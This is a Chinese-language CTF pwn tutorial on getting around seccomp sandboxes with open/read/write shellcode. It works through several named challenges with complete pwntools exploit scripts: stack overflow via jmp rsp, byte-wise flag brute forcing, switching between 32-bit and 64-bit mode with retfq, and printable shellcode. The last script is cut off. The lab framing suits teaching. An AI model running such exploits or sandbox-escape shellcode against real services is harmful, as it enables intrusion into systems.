栈沙箱学习之orw

ivi

衡阳信安 2023-08-18 00:00 发表于湖南

前言

学到这里，栈的学习就快要告一段落了，这里先会讲解一下栈沙箱orw绕过的一些知识，之后我们学习堆的时候会将堆orw绕过。

沙箱保护

沙箱保护是对程序加入一些保护，最常见的是禁用一些系统调用，如execve，使得我们不能通过系统调用execve或system等获取到远程终端权限，因此只能通过ROP的方式调用open, read, write的来读取并打印flag 内容

ORW

orw其实就是open,read,write的简写，其实就是打开flag，写入flag，输出flag

查看沙箱

可以利用seccomp-tools来查看是否开启了沙箱，以及沙箱中一些允许的syscall

1. $ sudo apt install gcc ruby-dev
   
2. $ gem install seccomp-tools

复制代码

1. seccomp-tools dump ./pwn

复制代码

利用上面指令即可查看程序沙箱信息

开启沙盒的两种方式

在ctf的pwn题中一般有两种函数调用方式实现沙盒机制，第一种是采用prctl函数调用，第二种是使用seccomp库函数。

prctl()函数调用

具体可以看一下prctl()函数详解_prctl函数_nedwons的博客-CSDN博客

看一下函数原型

1. #include <sys/prctl.h>
   
2. int prctl(int option, unsigned long arg2, unsigned long arg3, unsigned long arg4, unsigned long arg5);
   
3. 
   
4. // 主要关注prctl()函数的第一个参数，也就是option,设定的option的值的不同导致黑名单不同，介绍2个比较重要的option
   
5. // PR_SET_NO_NEW_PRIVS(38) 和 PR_SET_SECCOMP(22)
   
6. 
   
7. // option为38的情况
   
8. // 此时第二个参数设置为1，则禁用execve系统调用且子进程一样受用
   
9. prctl(38, 1LL, 0LL, 0LL, 0LL);
   
10. 
    
11. // option为22的情况
    
12. // 此时第二个参数为1，只允许调用read/write/_exit(not exit_group)/sigreturn这几个syscall
    
13. // 第二个参数为2，则为过滤模式，其中对syscall的限制通过参数3的结构体来自定义过滤规则。
    
14. prctl(22, 2LL, &v1);

复制代码

seccomp()函数调用

1. __int64 sandbox()
   
2. {
   
3.   __int64 v1; // [rsp+8h] [rbp-8h]
   
4. 
   
5.   // 这里介绍两个重要的宏，SCMP_ACT_ALLOW(0x7fff0000U) SCMP_ACT_KILL( 0x00000000U)
   
6.   // seccomp初始化，参数为0表示白名单模式，参数为0x7fff0000U则为黑名单模式
   
7.   v1 = seccomp_init(0LL);
   
8.   if ( !v1 )
   
9.   {
   
10.     puts("seccomp error");
    
11.     exit(0);
    
12.   }
    
13. 
    
14.   // seccomp_rule_add添加规则
    
15.   // v1对应上面初始化的返回值
    
16.   // 0x7fff0000即对应宏SCMP_ACT_ALLOW
    
17.   // 第三个参数代表对应的系统调用号，0-->read/1-->write/2-->open/60-->exit
    
18.   // 第四个参数表示是否需要对对应系统调用的参数做出限制以及指示做出限制的个数，传0不做任何限制
    
19.   seccomp_rule_add(v1, 0x7FFF0000LL, 2LL, 0LL);
    
20.   seccomp_rule_add(v1, 0x7FFF0000LL, 0LL, 0LL);
    
21.   seccomp_rule_add(v1, 0x7FFF0000LL, 1LL, 0LL);
    
22.   seccomp_rule_add(v1, 0x7FFF0000LL, 60LL, 0LL);
    
23.   seccomp_rule_add(v1, 0x7FFF0000LL, 231LL, 0LL);
    
24. 
    
25.   // seccomp_load->将当前seccomp过滤器加载到内核中
    
26.   if ( seccomp_load(v1) < 0 )
    
27.   {
    
28.     // seccomp_release->释放seccomp过滤器状态
    
29.     // 但对已经load的过滤规则不影响
    
30.     seccomp_release(v1);
    
31.     puts("seccomp error");
    
32.     exit(0);
    
33.   }
    
34.   return seccomp_release(v1);
    
35. }

复制代码

shellcode写入哪里？

一般这种ORW题目给出的溢出大小不够我们写入很长的ROP链的，因此会提供mmap()函数，从而给出一段在栈上的内存

使用mmap申请适合4byte的寄存器的地址

mmap()函数原型

1. __int64 sandbox()
   
2. {
   
3.   __int64 v1; // [rsp+8h] [rbp-8h]
   
4. 
   
5.   // 这里介绍两个重要的宏，SCMP_ACT_ALLOW(0x7fff0000U) SCMP_ACT_KILL( 0x00000000U)
   
6.   // seccomp初始化，参数为0表示白名单模式，参数为0x7fff0000U则为黑名单模式
   
7.   v1 = seccomp_init(0LL);
   
8.   if ( !v1 )
   
9.   {
   
10.     puts("seccomp error");
    
11.     exit(0);
    
12.   }
    
13. 
    
14.   // seccomp_rule_add添加规则
    
15.   // v1对应上面初始化的返回值
    
16.   // 0x7fff0000即对应宏SCMP_ACT_ALLOW
    
17.   // 第三个参数代表对应的系统调用号，0-->read/1-->write/2-->open/60-->exit
    
18.   // 第四个参数表示是否需要对对应系统调用的参数做出限制以及指示做出限制的个数，传0不做任何限制
    
19.   seccomp_rule_add(v1, 0x7FFF0000LL, 2LL, 0LL);
    
20.   seccomp_rule_add(v1, 0x7FFF0000LL, 0LL, 0LL);
    
21.   seccomp_rule_add(v1, 0x7FFF0000LL, 1LL, 0LL);
    
22.   seccomp_rule_add(v1, 0x7FFF0000LL, 60LL, 0LL);
    
23.   seccomp_rule_add(v1, 0x7FFF0000LL, 231LL, 0LL);
    
24. 
    
25.   // seccomp_load->将当前seccomp过滤器加载到内核中
    
26.   if ( seccomp_load(v1) < 0 )
    
27.   {
    
28.     // seccomp_release->释放seccomp过滤器状态
    
29.     // 但对已经load的过滤规则不影响
    
30.     seccomp_release(v1);
    
31.     puts("seccomp error");
    
32.     exit(0);
    
33.   }
    
34.   return seccomp_release(v1);
    
35. }

复制代码

mmap
addr	要申请的地址	建议四位
length	从addr开始申请的长度	建议一页0x1000
prot	权限	7
flags	确定映射的更新是否对其他进程可见	0x22
fd	映射到文件描述符fd	0xFFFFFFFF
offset	映射偏移	NULL

实例操作[极客大挑战 2019]Not Badorw都有

checksec

64位，保护全关

seccomp-tools

这里可以看到orw权限都开了，即可以正常使用open,read,write

IDA分析

sub_400949()

1. __int64 sub_400949()
   
2. {
   
3.   __int64 v1; // [rsp+8h] [rbp-8h]
   
4. 
   
5.   v1 = seccomp_init(0LL);
   
6.   seccomp_rule_add(v1, 0x7FFF0000LL, 0LL, 0LL);
   
7.   seccomp_rule_add(v1, 0x7FFF0000LL, 1LL, 0LL);
   
8.   seccomp_rule_add(v1, 0x7FFF0000LL, 2LL, 0LL);
   
9.   seccomp_rule_add(v1, 0x7FFF0000LL, 60LL, 0LL);
   
10.   return seccomp_load(v1);
    
11. }

复制代码

这里是用seccomp()开启的沙箱，和我们上面分析的结果一样，都是允许调用open,read,write,exit

sub_400A16()

1. int sub_400A16()
   
2. {
   
3.   char buf[32]; // [rsp+0h] [rbp-20h] BYREF
   
4. 
   
5.   puts("Easy shellcode, have fun!");
   
6.   read(0, buf, 0x38uLL);
   
7.   return puts("Baddd! Focu5 me! Baddd! Baddd!");
   
8. }

复制代码

这里是一个read的栈溢出漏洞，可以利用这里打栈溢出

sub_400906()

1. void sub_400906()
   
2. {
   
3.   setbuf(stdin, 0LL);
   
4.   setbuf(stdout, 0LL);
   
5.   setbuf(stderr, 0LL);
   
6. }

复制代码

设定关闭缓冲区

main()

1. __int64 __fastcall main(int a1, char **a2, char **a3)
   
2. {
   
3.   mmap((void *)0x123000, 0x1000uLL, 6, 34, -1, 0LL);
   
4.   sub_400949();
   
5.   sub_400906();
   
6.   sub_400A16();
   
7.   return 0LL;
   
8. }

复制代码

sub_4009EE()

1. void sub_4009EE()
   
2. {
   
3.   __asm { jmp     rsp }
   
4. }

复制代码

提供了jmp_rsp

_mmap()

1. // attributes: thunk
   
2. void *mmap(void *addr, size_t len, int prot, int flags, int fd, __off_t offset)
   
3. {
   
4.   return mmap(addr, len, prot, flags, fd, offset);
   
5. }

复制代码

使用mmap提供了一块内存

gdb动调

1. 32+8=40

复制代码

知道了起始地址，这段空间大小0x1000,也就是说read里面读取到哪里都无所谓反正mmap_place+x<=max_place就可以，后面那个0x100是读取大小

所以思路也就有了：

·     首先构造我们的shellcode

·     利用jmp_rsp，跳转到给我们提供mmap的内存这里写入我们的ROP链

·     getshell

先上exp:

1. #coding=utf-8
   
2. import os
   
3. import sys
   
4. import time
   
5. from pwn import *
   
6. from ctypes import *
   
7. 
   
8. context.log_level='debug'
   
9. context.arch='amd64'
   
10. 
    
11. p=remote("node4.buuoj.cn",25757)
    
12. #p=process('./pwn')
    
13. elf = ELF('./pwn')
    
14. libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    
15. 
    
16. s       = lambda data               :p.send(data)
    
17. ss      = lambda data               :p.send(str(data))
    
18. sa      = lambda delim,data         :p.sendafter(str(delim), str(data))
    
19. sl      = lambda data               :p.sendline(data)
    
20. sls     = lambda data               :p.sendline(str(data))
    
21. sla     = lambda delim,data         :p.sendlineafter(str(delim), str(data))
    
22. r       = lambda num                :p.recv(num)
    
23. ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)
    
24. itr     = lambda                    :p.interactive()
    
25. uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
    
26. uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
    
27. leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))
    
28. l64     = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,b"\x00"))
    
29. l32     = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,b"\x00"))
    
30. context.terminal = ['gnome-terminal','-x','sh','-c']
    
31. def dbg():
    
32.     gdb.attach(p,'b *$rebase(0x13aa)')
    
33.     pause()
    
34. 
    
35. #dbg()
    
36. ru('Easy shellcode, have fun!')
    
37. 
    
38. mmap=0x123000
    
39. #orw=shellcraft.open('./flag.txt')
    
40. orw=shellcraft.open('./flag')
    
41. orw+=shellcraft.read(3,mmap,0x50)
    
42. orw+=shellcraft.write(1,mmap,0x50)
    
43. 
    
44. jmp_rsp=0x400A01
    
45. 
    
46. pl=asm(shellcraft.read(0,mmap,0x100))+asm('mov rax,0x123000;call rax')
    
47. pl=pl.ljust(0x28,b'\x00')
    
48. pl+=p64(jmp_rsp)+asm('sub rsp,0x30;jmp rsp')
    
49. 
    
50. 
    
51. sl(pl)
    
52. 
    
53. shell=asm(orw)
    
54. sl(shell)
    
55. 
    
56. p.interactive()

复制代码

解释一下exp

·     第一个框就是构造我们orw的shellcode了，先打开flag文件，之后利用read写入flag，再输出flag

这里先说一下为什么read的fd是3，可以结合下面图片，0~2都是保留的用于缓冲区，我们打开第一个新文件的文件描述符是3，第二个是4，以此类推

·     第二个框就是我们所说的jmp_rsp的地址

·     第三个框就是我们将ROP写到mmap提供的栈的内存上，之后利用jmp_rsp跳转到orw_shellcode的地方

2021-蓝帽杯初赛-slientor缺w->采取爆破

checksec

64位程序，保护全开

seccomp-tools

这里要注意要在root下查看

1. root@ubuntu:/home/evil/Desktop/pwn test/orw/ciscn2023/2021 slient# seccomp-tools dump ./pwn
   
2. Welcome to silent execution-box.
   
3. 
   
4. line  CODE  JT   JF      K
   
5. =================================
   
6. 0000: 0x20 0x00 0x00 0x00000004  A = arch
   
7. 0001: 0x15 0x00 0x06 0xc000003e  if (A != ARCH_X86_64) goto 0008
   
8. 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
   
9. 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
   
10. 0004: 0x15 0x00 0x03 0xffffffff  if (A != 0xffffffff) goto 0008
    
11. 0005: 0x15 0x01 0x00 0x00000000  if (A == read) goto 0007
    
12. 0006: 0x15 0x00 0x01 0x00000002  if (A != open) goto 0008
    
13. 0007: 0x06 0x00 0x00 0x7fff0000  return ALLOW
    
14. 0008: 0x06 0x00 0x00 0x00000000  return KILL

复制代码

这里可以看到只有read和open

IDA分析

main()

1. void __fastcall main(__int64 a1, char **a2, char **a3)
   
2. {
   
3.   unsigned int v3; // eax
   
4.   __int128 v4; // xmm0
   
5.   __int128 v5; // xmm1
   
6.   __int128 v6; // xmm2
   
7.   __int64 v7; // [rsp+48h] [rbp-68h]
   
8.   __int64 v8; // [rsp+50h] [rbp-60h]
   
9.   __int128 buf; // [rsp+60h] [rbp-50h] BYREF
   
10.   __int128 v10; // [rsp+70h] [rbp-40h]
    
11.   __int128 v11; // [rsp+80h] [rbp-30h]
    
12.   __int128 v12; // [rsp+90h] [rbp-20h]
    
13.   unsigned __int64 v13; // [rsp+A0h] [rbp-10h]
    
14. 
    
15.   v13 = __readfsqword(0x28u);
    
16.   sub_A60(a1, a2, a3);
    
17.   v12 = 0LL;
    
18.   v11 = 0LL;
    
19.   v10 = 0LL;
    
20.   buf = 0LL;
    
21.   puts("Welcome to silent execution-box.");
    
22.   v3 = getpagesize();
    
23.   v8 = (int)mmap((void *)0x1000, v3, 7, 34, 0, 0LL);
    
24.   read(0, &buf, 0x40uLL);
    
25.   prctl(38, 1LL, 0LL, 0LL, 0LL);
    
26.   prctl(4, 0LL);
    
27.   v7 = seccomp_init(0LL);
    
28.   seccomp_rule_add(v7, 2147418112LL, 2LL, 0LL);
    
29.   seccomp_rule_add(v7, 2147418112LL, 0LL, 0LL);
    
30.   seccomp_load(v7);
    
31.   v4 = buf;
    
32.   v5 = v10;
    
33.   v6 = v11;
    
34.   *(_OWORD *)(v8 + 48) = v12;
    
35.   *(_OWORD *)(v8 + 32) = v6;
    
36.   *(_OWORD *)(v8 + 16) = v5;
    
37.   *(_OWORD *)v8 = v4;
    
38.   ((void (__fastcall *)(__int64, __int64, __int64))v8)(3735928559LL, 3735928559LL, 3735928559LL);
    
39.   if ( __readfsqword(0x28u) != v13 )
    
40.     init();
    
41. }

复制代码

分析一下main(),就是利用mmap()申请了0x1000的内存空间，然后利用seccomp()设置了沙箱，read允许读入0x40大小的数据

这道题不知道为啥好像动调不了，有可能是我太菜了动调不动，不过在系统函数说明中有这样一说

1. // about mmap (link: https://man7.org/linux/man-pages/man2/mmap.2.html)
   
2. // 1. SYNOPSIS
   
3. #include <sys/mman.h>
   
4. void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset);
   
5. 
   
6. /* 2. DESCRIPTION
   
7. mmap() creates a new mapping in the virtual address space of the
   
8.        calling process.  The starting address for the new mapping is
   
9.        specified in addr.  The length argument specifies the length of
   
10.        the mapping (which must be greater than 0).
    
11. 
    
12.        If addr is NULL, then the kernel chooses the (page-aligned)
    
13.        address at which to create the mapping; this is the most portable
    
14.        method of creating a new mapping.  If addr is not NULL, then the
    
15.        kernel takes it as a hint about where to place the mapping; on
    
16.        Linux, the kernel will pick a nearby page boundary (but always
    
17.        above or equal to the value specified by
    
18.        /proc/sys/vm/mmap_min_addr) and attempt to create the mapping
    
19.        there.  If another mapping already exists there, the kernel picks
    
20.        a new address that may or may not depend on the hint.  The
    
21.        address of the new mapping is returned as the result of the call.
    
22. ......
    
23. */

复制代码

由 on Linux, the kernel will pick a nearby page boundary (but alwaysabove or equal to the value specified by /proc/sys/vm/mmap_min_addr) 可知：Linux 为 mmap 分配虚拟内存时，总是从最接近 addr 的页边缘开始的，而且保证地址不低于 /proc/sys/vm/mmap_min_addr 所指定的值。
可以看到，mmap_min_addr = 65536 = 0x10000，因此刚才判断程序利用 mmap 函数在 0x10000 处开辟一个 page 的空间

因此mmap申请的内存的起始地址应该为0x10000,截至地址应该为0x11000,大小为0x1000，这里附上其他师傅进行动调vmmap得到的结果，和我所理解的是一样的

由于缺少write()函数，我们无法输出flag，可以进行单个字节的对比爆，即读取flag到一块内存区域，随后单字节爆破，在shellcode中设置loop循环，一旦cmp命中就让程序卡死，否则执行后面的exit因为沙箱禁用程序崩溃退出，根据程序的表现可以区分是否命中，注意因为服务器通信不稳定，每次读到一段flag就更新exp中的flag字符串继续向后爆破

exp：

1. #coding=utf-8
   
2. from pwn import *
   
3. 
   
4. context.update(arch='amd64',os='linux',log_level='info')
   
5. 
   
6. def exp(dis,char):
   
7.     p.recvuntil("Welcome to silent execution-box.\n")
   
8.     shellcode = asm('''
   
9.             mov r12,0x67616c66
   
10.             push r12
    
11.             mov rdi,rsp
    
12.             xor esi,esi
    
13.             xor edx,edx
    
14.             mov al,2
    
15.             syscall
    
16.             mov rdi,rax
    
17.             mov rsi,0x10700
    
18.             mov dl,0x40
    
19.             xor rax,rax
    
20.             syscall
    
21.             mov dl, byte ptr [rsi+{}]
    
22.             mov cl, {}
    
23.             cmp cl,dl
    
24.             jz loop
    
25.             mov al,60
    
26.             syscall
    
27.             loop:
    
28.             jmp loop
    
29.             '''.format(dis,char))
    
30.     p.send(shellcode)
    
31. flag = "flag{"
    
32. 
    
33. for i in range(len(flag),35):
    
34.     sleep(1)
    
35.     log.success("flag : {}".format(flag))
    
36.     for j in range(0x20,0x80):
    
37.         p = process('./pwn')
    
38.         try:
    
39.             exp(i,j)
    
40.             p.recvline(timeout=1)
    
41.             flag += chr(j)
    
42.             p.send('\n')
    
43.             log.success("{} pos : {} success".format(i,chr(j)))
    
44.             p.close()
    
45.             break
    
46.         except:           
    
47.             p.close()

复制代码

解释一下exp，主要是解释shellcode

·     第一个框，这里其实就是open('./flag'),因为程序都是小端序的，我们要输入galf的16进制，程序才会解析为flag

·     第二个框，这里其实就是read(fd,0x10700,0x40)

·     第三个框，这里就是利用loop循环写的一个汇编语言单字节爆破，此时rsi经过传参保存的是flag的地址，利用cmp检查flag[index]是否等于需要的flag，若相等咋会卡在这个循环中，否则继续爆破

RW缺 O可以借助fstat()->利用retfq汇编指令切换至32位调用open

这里从网上实在找不到题目，就借用ex团长的一道题目进行理解分析吧，虽然原文章已经写的很好了，具体题目分析可以看一下参考链接shellcode的艺术中的第六模块

顺便讲一下retf这个汇编指令

·     CPU执行ret指令时,相当于进行

1. pop IP

复制代码

·     CPU执行retf指令时,相当于进行:

1. pop IP
   
2. pop Cs

复制代码

·     32bit cs 0x23

1. ;;nasm -f elf32 test_cs_32.asm
   
2. ;;ld -m elf_i386 -o test_cs_32
   
3. global _start
   
4. _start:
   
5.   push 0x0068732f
   
6.   push 0x6e69622f
   
7.   mov ebx,esp
   
8.   xor ecx,ecx
   
9.   xor edx,edx
   
10.   mov eax,11
    
11.   int 0x80
    

复制代码

·     64bit cs 0x33

1. ;;nasm -f elf64 test_cs_64.asm
   
2. ;;ld -m elf_x86_64 -o test_cs_64 test_cs_64.o
   
3. global _start
   
4. _start:
   
5.   mov r10,0x0068732f6e69622f
   
6.   push r10
   
7.   mov rdi,rsp
   
8.   xor rsi,rsi
   
9.   xor rdx,rdx
   
10.   mov rax,0x3b
    
11.   syscall

复制代码

还有要注意一下，当从64位切换到32位的时候，64位下会push一个8byte的数

1. push 0x20
   
2. push addr
   
3. retf

复制代码

栈的结构

1. rsp->   00----addr----00
   
2.         0000000000000020

复制代码

转为32位时

1. esp->   0-addr-0
   
2.         00000020

复制代码

可以采取

1. to32bit:
   
2.     ; retf to 32bit
   
3.     push addr
   
4.     mov r15,0x2300000000
   
5.     add qword [rsp],r15
   
6.     retf

复制代码

此时的栈结构

1. rsp->   0-addr-020000000
   
2. //也就是
   
3. esp->   0-addr-0
   
4.         00000020

复制代码

32位转换为64位时

直接转换即可，因为不存在push一个8byte的数了

1. push 0x20
   
2. push addr
   
3. retf

复制代码

现在讲解了retf的一些基础知识以及在转换中的一些细节，现在我们回到题目继续看一下这道题目。

seccomp-tools

1. $ seccomp-tools dump ./shellcode
   
2. ---------- Shellcode ----------
   
3. line  CODE  JT   JF      K
   
4. =================================
   
5. 0000: 0x20 0x00 0x00 0x00000000  A = sys_number
   
6. 0001: 0x15 0x06 0x00 0x00000005  if (A == fstat) goto 0008
   
7. 0002: 0x15 0x05 0x00 0x00000025  if (A == alarm) goto 0008
   
8. 0003: 0x15 0x04 0x00 0x00000001  if (A == write) goto 0008
   
9. 0004: 0x15 0x03 0x00 0x00000000  if (A == read) goto 0008
   
10. 0005: 0x15 0x02 0x00 0x00000009  if (A == mmap) goto 0008
    
11. 0006: 0x15 0x01 0x00 0x000000e7  if (A == exit_group) goto 0008
    
12. 0007: 0x06 0x00 0x00 0x00000000  return KILL
    
13. 0008: 0x06 0x00 0x00 0x7fff0000  return ALLOW

复制代码

可以看到可以调用write,read,mmap但是没有open，这个时候可以利用fstat()函数，该函数的 64 位系统调用号为 5，这个是 open 函数的 32 位系统调用号）

所以这道题的思路也就有了，利用 retfq 汇编指令进行 32 位和 64 位系统格式之间的切换，在 32 位格式下执行 open 函数打开 flag 文件，在 64 位格式下执行输入输出。

相关系统调用号可以参考linux 系统调用号表_linux系统调用号_Anciety的博客-CSDN博客

这道题ex团长设计的还是难顶的，限制输入的 shellcode 必须是可打印字符，我们可以借助一些技巧从而构造汇编指令(比如异或之类的算法操作)

可以用shellcode的艺术中的第三模块中的总结用法，比如

1. xor al, 立即数
   
2. xor byte ptr [eax… + 立即数], al dl…
   
3. xor byte ptr [eax… + 立即数], ah dh…
   
4. xor dword ptr [eax… + 立即数], esi edi
   
5. xor word ptr [eax… + 立即数], si di
   
6. xor al dl…, byte ptr [eax… + 立即数]
   
7. xor ah dh…, byte ptr [eax… + 立即数]
   
8. xor esi edi, dword ptr [eax… + 立即数]
   
9. xor si di, word ptr [eax… + 立即数]

复制代码

exp:

1. #coding:utf-8
   
2. from pwn import *
   
3. context.log_level = 'debug'
   
4. p = process('./shellcode')
   
5. # p = remote("nc.eonew.cn","10011")
   
6. p.recvuntil("shellcode: ")
   
7. 
   
8. append_x86 = '''
   
9. push ebx
   
10. pop ebx
    
11. '''
    
12. append = '''
    
13. /* 机器码: 52 5a */
    
14. push rdx
    
15. pop rdx
    
16. '''
    
17. 
    
18. shellcode_x86 = '''
    
19. /*fp = open("flag")*/
    
20. mov esp,0x40404140
    
21. 
    
22. /* s = "flag" */
    
23. push 0x67616c66
    
24. 
    
25. /* ebx = &s */
    
26. push esp
    
27. pop ebx
    
28. 
    
29. /* ecx = 0 */
    
30. xor ecx,ecx
    
31. 
    
32. mov eax,5
    
33. int 0x80
    
34. 
    
35. mov ecx,eax
    
36. '''
    
37. 
    
38. shellcode_flag = '''
    
39. /* retfq:  mode_32 -> mode_64*/
    
40. push 0x33
    
41. push 0x40404089
    
42. retfq
    
43. 
    
44. /*read(fp,buf,0x70)*/
    
45. mov rdi,rcx
    
46. mov rsi,rsp
    
47. mov rdx,0x70
    
48. xor rax,rax
    
49. syscall
    
50. 
    
51. /*write(1,buf,0x70)*/
    
52. mov rdi,1
    
53. mov rax,1
    
54. syscall
    
55. '''
    
56. shellcode_x86 = asm(shellcode_x86)
    
57. shellcode_flag = asm(shellcode_flag, arch = 'amd64', os = 'linux')
    
58. shellcode = ''
    
59. 
    
60. # 0x40404040 为32位shellcode地址
    
61. shellcode_mmap = '''
    
62. /*mmap(0x40404040,0x7e,7,34,0,0)*/
    
63. push 0x40404040 /*set rdi*/
    
64. pop rdi
    
65. 
    
66. push 0x7e /*set rsi*/
    
67. pop rsi
    
68. 
    
69. push 0x40 /*set rdx*/
    
70. pop rax
    
71. xor al,0x47
    
72. push rax
    
73. pop rdx
    
74. 
    
75. push 0x40 /*set r8*/
    
76. pop rax
    
77. xor al,0x40
    
78. push rax
    
79. pop r8
    
80. 
    
81. push rax /*set r9*/
    
82. pop r9
    
83. 
    
84. /*syscall*/
    
85. /* syscall 的机器码是 0f 05, 都是不可打印字符. */
    
86. /* 用异或运算来解决这个问题: 0x0f = 0x5d^0x52, 0x05 = 0x5f^0x5a. */
    
87. /* 其中 0x52,0x5a 由 append 提供. */
    
88. push rbx
    
89. pop rax
    
90. push 0x5d
    
91. pop rcx
    
92. xor byte ptr[rax+0x31],cl
    
93. push 0x5f
    
94. pop rcx
    
95. xor byte ptr[rax+0x32],cl
    
96. 
    
97. push 0x22 /*set rcx*/
    
98. pop rcx
    
99. 
    
100. push 0x40/*set rax*/
     
101. pop rax
     
102. xor al,0x49
     
103. '''
     
104. shellcode_read = '''
     
105. /*read(0,0x40404040,0x70)*/
     
106. 
     
107. push 0x40404040 /*set rsi*/
     
108. pop rsi
     
109. 
     
110. push 0x40 /*set rdi*/
     
111. pop rax
     
112. xor al,0x40
     
113. push rax
     
114. pop rdi
     
115. 
     
116. xor al,0x40 /*set rdx*/
     
117. push 0x70
     
118. pop rdx
     
119. 
     
120. /*syscall*/
     
121. push rbx
     
122. pop rax
     
123. push 0x5d
     
124. pop rcx
     
125. xor byte ptr[rax+0x57],cl
     
126. push 0x5f
     
127. pop rcx
     
128. xor byte ptr[rax+0x58],cl
     
129. 
     
130. push rdx /*set rax*/
     
131. pop rax
     
132. xor al,0x70
     
133. '''
     
134. 
     
135. shellcode_retfq = '''
     
136. /*mode_64 -> mode_32*/
     
137. push rbx
     
138. pop rax
     
139. 
     
140. xor al,0x40
     
141. 
     
142. push 0x72
     
143. pop rcx
     
144. xor byte ptr[rax+0x40],cl
     
145. push 0x68
     
146. pop rcx
     
147. xor byte ptr[rax+0x40],cl
     
148. push 0x47
     
149. pop rcx
     
150. sub byte ptr[rax+0x41],cl
     
151. push 0x48
     
152. pop rcx
     
153. sub byte ptr[rax+0x41],cl
     
154. push rdi
     
155. push rdi
     
156. push 0x23
     
157. push 0x40404040
     
158. pop rax
     
159. push rax
     
160. '''
     
161. 
     
162. # mmap
     
163. shellcode += shellcode_mmap
     
164. shellcode += append
     
165. 
     
166. # read shellcode
     
167. shellcode += shellcode_read
     
168. shellcode += append
     
169. 
     
170. # mode_64 -> mode_32
     
171. shellcode += shellcode_retfq
     
172. shellcode += append
     
173. 
     
174. shellcode = asm(shellcode,arch = 'amd64',os = 'linux')
     
175. print hex(len(shellcode))
     
176. 
     
177. #gdb.attach(p,"b *0x40027f\nb*0x4002eb\nc\nc\nsi\n")
     
178. p.sendline(shellcode)
     
179. pause()
     
180. 
     
181. p.sendline(shellcode_x86 + 0x29*'\x90' + shellcode_flag)
     
182. p.interactive()

复制代码

2021-强网杯-初赛-shellcode只有R无OW->上述两种方式的总结

这里就不多赘述了，只讲一下思路与exp

seccomp-tools

发现只有read,mmap，但是又fstat，所以可以解决没有open的情况，没有write可以利用loop循环，用cmp卡住程序，从而进行单字节爆破得到flag，所以这是上面两个题目的总结

exp:

1. #!/usr/bin/env python
   
2. import os
   
3. import time
   
4. from pwn import *
   
5. 
   
6. context.arch = 'amd64'
   
7. context.os = 'linux'
   
8. # context.log_level = 'debug'
   
9. 
   
10. def toPrintable(raw):
    
11.     with open("/tmp/raw","wb") as f:
    
12.         f.write(asm(raw,arch='amd64'))
    
13.     result = os.popen("python ~/pwntools/alpha3/ALPHA3.py x64 ascii mixedcase rbx --input=/tmp/raw").read()
    
14.     print("[*] Shellcode %s"%result)
    
15.     return result
    
16. 
    
17. def exp(p,a,b):
    
18.     shellcode1 = '''
    
19.         mov r10,rbx
    
20.         add r10w,0x0140
    
21.         xor rdi,rdi
    
22.         mov rsi,r10   
    
23.         xor rdx,rdx
    
24.         add dx,0x1040
    
25.         xor rax,rax
    
26.         syscall
    
27.         jmp r10
    
28.     '''
    
29.     shellcode2 = '''
    
30. 
    
31.         mov rdi,0x40000000
    
32.         mov rsi,0x1000
    
33.         mov rdx,0x7
    
34.         mov r10,0x22
    
35.         mov r8,0xFFFFFFFF
    
36.         xor r9,r9
    
37.         mov rax,0x9
    
38.         syscall
    
39. 
    
40.         mov rsi,rdi
    
41.         xor rdi,rdi
    
42.         mov rdx,0x1000
    
43.         xor rax,rax
    
44.         syscall
    
45.         jmp rsi
    
46.     '''
    
47.     shellcode3_ = '''
    
48.         mov r10,0x2300000000
    
49.         add rsi,0x13
    
50.         add rsi,r10
    
51.         push rsi
    
52.         retf
    
53. 
    
54.         mov esp,0x40000400
    
55.         push 0x0067
    
56.         push 0x616c662f
    
57.         mov ebx,esp
    
58.         xor ecx,ecx
    
59.         mov edx,0x7
    
60.         mov eax,0x5
    
61.         int 0x80
    
62. 
    
63.         push 0x33
    
64.         push 0x40000037
    
65.         retf
    
66. 
    
67.         mov rdi,rax
    
68.         mov rsi,0x40000500
    
69.         mov rdx,0x80
    
70.         xor rax,rax
    
71.         syscall
    
72. 
    
73.         push 0
    
74.         cmp byte ptr[rsi+{0}],{1}
    
75.         jz $-3
    
76.         ret
    
77.     '''.format(a,b) if a==0 else '''
    
78. 
    
79.         mov r10,0x2300000000
    
80.         add rsi,0x13
    
81.         add rsi,r10
    
82.         push rsi
    
83.         retf
    
84. 
    
85.         mov esp,0x40000400
    
86.         push 0x0067
    
87.         push 0x616c662f
    
88.         mov ebx,esp
    
89.         xor ecx,ecx
    
90.         mov edx,0x7
    
91.         mov eax,0x5
    
92.         int 0x80
    
93. 
    
94.         push 0x33
    
95.         push 0x40000037
    
96.         retf
    
97. 
    
98.         mov rdi,rax
    
99.         mov rsi,0x40000500
    
100.         mov rdx,0x80
     
101.         xor rax,rax
     
102.         syscall
     
103. 
     
104.         push 0
     
105.         cmp byte ptr[rsi+{0}],{1}
     
106.         jz $-4
     
107.         ret
     
108.     '''.format(a,b)
     
109.     # shellcode1 = toPrintable(shellcode1)
     
110.     # shellcode2 = asm(shellcode2,arch='amd64')
     
111.     # shellcode3 = asm(shellcode3,arch='amd64')
     
112.     # print "".join("\\x%02x"%ord(_) for _ in asm(shellcode,arch='amd64'))
     
113.     shellcode1 = "Sh0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M144x8n0R094y4l0p0S0x188K055M4z0x0A3r054q4z0q2H0p0z402Z002l8K4X00"
     
114.     shellcode2 = "\x48\xc7\xc7\x00\x00\x00\x40\x48\xc7\xc6\x00\x10\x00\x00\x48\xc7\xc2\x07\x00\x00\x00\x49\xc7\xc2\x22\x00\x00\x00\x49\xb8\xff\xff\xff\xff\x00\x00\x00\x00\x4d\x31\xc9\x48\xc7\xc0\x09\x00\x00\x00\x0f\x05\x48\x89\xfe\x48\x31\xff\x48\xc7\xc2\x00\x10\x00\x00\x48\x31\xc0\x0f\x05\xff\xe6"
     
